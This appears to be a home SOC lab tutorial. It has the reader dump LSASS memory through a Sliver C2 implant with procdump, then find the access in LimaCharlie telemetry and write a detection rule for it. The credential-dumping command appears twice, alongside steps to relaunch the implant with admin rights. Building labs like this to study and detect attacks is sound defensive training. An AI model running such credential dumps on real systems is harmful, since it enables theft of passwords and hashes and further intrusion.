
Part 3 - Credential Dumping & Threat Detection

Simulating adversary tactics in a SOC lab by using Sliver C2 to dump LSASS credentials, analyzing telemetry in LimaCharlie, and creating detection rules to identify credential theft attempts.

Now We'll Get Adversarial

Setting Up the Attack

Access Sliver C2

  1. Open an SSH session on your Linux VM.

  2. Drop into a C2 session on your victim host.

  3. If needed, retrace your steps from Part 2.

Check Privileges

  1. Run the following command to check permissions:

    getprivs
  2. Look for SeDebugPrivilege (required for advanced actions).

  3. If missing, relaunch your C2 implant with admin rights.


Dump LSASS Process (Credential Theft)

Why?

Attackers dump the LSASS process to steal passwords and hashes stored in memory. These credentials can be used to access other systems.

How?

They use tools like:

🔹 Procdump, a legitimate Microsoft Sysinternals tool that is misused to dump LSASS memory.

Run the following command from your Sliver session to dump LSASS:

    procdump -n lsass.exe -s lsass.dmp

📌 This will save the dump on your Sliver C2 server.

❗ Even if the command fails, the access attempt itself usually generates telemetry, so detection is still possible.


Detecting the Attack

Analyze Telemetry in LimaCharlie

  1. Open the LimaCharlie web UI.

  2. Navigate to Timeline on your Windows VM sensor.

  3. Use the Event Type filter to search for SENSITIVE_PROCESS_ACCESS.

    Key Observations

    Source Process

    • File Path: C:\Users\User\Downloads\FORTHCOMING_FLASH.exe
    • Command Line Execution: "C:\Users\User\Downloads\FORTHCOMING_FLASH.exe"
    • Unsigned Binary: Yes (Potentially Untrusted)
    • Hash: 6923c3553a1909b58c3b512be64a2e6113e998319ce39352c616f0219cb35

    Target Process

    • File Path: C:\Windows\System32\lsass.exe
    • Command Line Execution: "C:\Windows\System32\lsass.exe"
    • Signed Binary: Yes (Legitimate System File)

    Security Concern

    • Potential Credential Dumping: The unsigned binary attempted to access lsass.exe, a critical authentication process.
    • Possible Malware Activity: Credential theft tactics frequently target lsass.exe.

  4. Identify the event related to LSASS access.

Create a Detection & Response (D&R) Rule

  1. Click Create Rule based on the detected event.

  2. Replace the Detect section with:

    event: SENSITIVE_PROCESS_ACCESS
    op: ends with
    path: event/*/TARGET/FILE_PATH
    value: lsass.exe
  3. Replace the Respond section with:

    - action: report
      name: LSASS access
  4. Save the rule as "LSASS Accessed" and enable it.
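To see what the Detect block above actually does when it runs against telemetry, here is an added Python re-implementation of its `ends with` logic over constructed SENSITIVE_PROCESS_ACCESS events; this is not LimaCharlie's engine or the page's code, and the event nesting (event/ACCESS/TARGET/FILE_PATH) and the FILE_IS_SIGNED field are assumptions chosen so the page's wildcard path resolves.

```python
# Simplified evaluator for the page's D&R "ends with" rule; not LimaCharlie's engine.
# The event shape is assumed/constructed so the page's path event/*/TARGET/FILE_PATH resolves.

LSASS_RULE = {  # the Detect block from the page, as a dict
    "event": "SENSITIVE_PROCESS_ACCESS",
    "op": "ends with",
    "path": "event/*/TARGET/FILE_PATH",
    "value": "lsass.exe",
}

def resolve_path(obj, parts: list[str]):
    """Walk a slash-separated path; '*' expands to every dict key or list element."""
    if not parts:
        yield obj
    elif isinstance(obj, dict):
        for key in (list(obj) if parts[0] == "*" else [parts[0]]):
            if key in obj:
                yield from resolve_path(obj[key], parts[1:])
    elif isinstance(obj, list) and parts[0] == "*":
        for item in obj:
            yield from resolve_path(item, parts[1:])

def rule_matches(rule: dict, envelope: dict, case_sensitive: bool = False) -> bool:
    """True when event_type equals rule['event'] and a value at rule['path'] ends with rule['value']."""
    if envelope.get("routing", {}).get("event_type") != rule["event"] or rule["op"] != "ends with":
        return False
    norm = (lambda s: s) if case_sensitive else str.lower
    return any(isinstance(v, str) and norm(v).endswith(norm(rule["value"]))
               for v in resolve_path(envelope, rule["path"].split("/")))

def _event(event_type: str, src: str, src_signed: int, tgt: str) -> dict:
    # Constructed event; FILE_IS_SIGNED meaning (1 = signed, 0 = unsigned) is assumed.
    return {"routing": {"event_type": event_type},
            "event": {"ACCESS": {"SOURCE": {"FILE_PATH": src, "FILE_IS_SIGNED": src_signed},
                                 "TARGET": {"FILE_PATH": tgt, "FILE_IS_SIGNED": 1}}}}

SPA = "SENSITIVE_PROCESS_ACCESS"
SAMPLE_EVENTS = [  # constructed telemetry mirroring the page's Key Observations
    _event(SPA, r"C:\Users\User\Downloads\FORTHCOMING_FLASH.exe", 0, r"C:\Windows\System32\lsass.exe"),
    _event(SPA, r"C:\Windows\System32\svchost.exe", 1, r"C:\Windows\System32\csrss.exe"),  # other target
    _event("NEW_PROCESS", r"C:\Windows\System32\LSASS.EXE", 1, r"C:\Windows\System32\LSASS.EXE"),  # wrong type
]

def triage(events: list[dict], rule: dict = LSASS_RULE) -> list[dict]:
    """Return each hit with the context the page's Key Observations call out (source path, signed?)."""
    hits = []
    for env in events:
        if rule_matches(rule, env):
            src = next(resolve_path(env, ["event", "*", "SOURCE"]), {})
            hits.append({"source": src.get("FILE_PATH"), "unsigned_source": src.get("FILE_IS_SIGNED") == 0})
    return hits
```

Only the first constructed event fires: the second targets a different process and the third carries the wrong event type, which is exactly the gating the `event:` and `path:` keys provide.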

Test the Detection Rule

  1. Click Target Event to see the raw event.

  2. Scroll to the bottom and click Test Event.

  3. If a "Match" appears, the rule is correctly detecting LSASS access.


Validating the Detection

Re-run the Attack

  1. Return to your Sliver server and rerun:

    procdump -n lsass.exe -s lsass.dmp
  2. If your C2 session dies, relaunch the malware.

Check for Detections

  1. Open LimaCharlie and go to the Detections tab.

  2. Click "Back to Sensors" if needed.

  3. Expand the detection entry to view the raw event.

  4. Click View Event Timeline to analyze when and how the attack occurred.
